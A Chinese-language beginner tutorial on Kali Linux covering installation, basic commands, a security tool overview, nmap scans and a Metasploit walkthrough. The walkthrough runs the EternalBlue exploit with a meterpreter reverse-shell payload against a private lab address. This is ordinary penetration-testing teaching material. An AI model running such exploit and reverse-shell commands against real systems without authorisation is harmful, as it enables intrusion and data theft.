Kali Linux 入门教程

Kali Linux 简介

Kali Linux 是一个基于 Debian 的 Linux 发行版，专为数字取证和渗透测试设计。它由 Offensive Security 公司维护和资助，预装了数百种安全工具。

安装 Kali Linux

系统要求

• 至少 20GB 硬盘空间
• 至少 2GB RAM (推荐 4GB 或更多)
• 支持网络安装的 CD-DVD 驱动器或 USB 端口

安装方法

1. 从官方下载 Kali Linux 镜像: https://www.kali.org/get-kali/
2. 创建启动 USB:

   # 使用 dd 命令 (Linux/Mac)
   dd if=kali-linux-2023.4-installer-amd64.iso of=/dev/sdb bs=4M status=progress
   
   # Windows 用户可以使用 Rufus 工具

3. 从 USB 启动并按照安装向导操作

基本命令

系统信息

uname -a                  # 显示系统信息
lsb_release -a            # 显示发行版信息
cat /etc/os-release       # 显示 OS 信息
df -h                     # 显示磁盘空间
free -h                   # 显示内存使用情况

包管理

sudo apt update           # 更新包列表
sudo apt upgrade          # 升级所有已安装的包
sudo apt install <package> # 安装新包
sudo apt remove <package>  # 移除包
sudo apt autoremove       # 移除不再需要的依赖

常用工具概览

信息收集

• nmap - 网络扫描工具
• recon-ng - Web 侦查框架
• theHarvester - 电子邮件和子域名收集

漏洞分析

• metasploit-framework - 渗透测试框架
• sqlmap - SQL 注入工具
• burpsuite - Web 应用安全测试

密码攻击

• hydra - 在线密码破解
• john - 离线密码破解
• hashcat - 高级密码恢复

Nmap 使用示例

# 基本扫描
nmap -sV 192.168.1.1

# 全面扫描 (包括 OS 检测, 脚本扫描,  traceroute)
nmap -A 192.168.1.1

# 扫描特定端口
nmap -p 80,443,22 192.168.1.1

# 扫描整个子网
nmap 192.168.1.0/24

# 使用 NSE 脚本扫描漏洞
nmap --script vuln 192.168.1.1

Metasploit 使用示例

# 启动 Metasploit 控制台
msfconsole

# 搜索漏洞利用模块
search eternalblue

# 使用模块
use exploit/windows/smb/ms17_010_eternalblue

# 设置目标
set RHOSTS 192.168.1.100

# 设置 payload
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10

# 执行攻击
exploit

# 在 meterpreter 会话中的常用命令
sysinfo              # 获取系统信息
shell                # 获取系统 shell
download <file>     # 下载文件
upload <file>       # 上传文件

学习资源

• 官方文档: https://www.kali.org/docs/
• Kali Linux Revealed 书籍 (官方培训教材)
• Offensive Security 认证课程 (OSCP, PEN-200)
• Hack The Box 和 TryHackMe 在线平台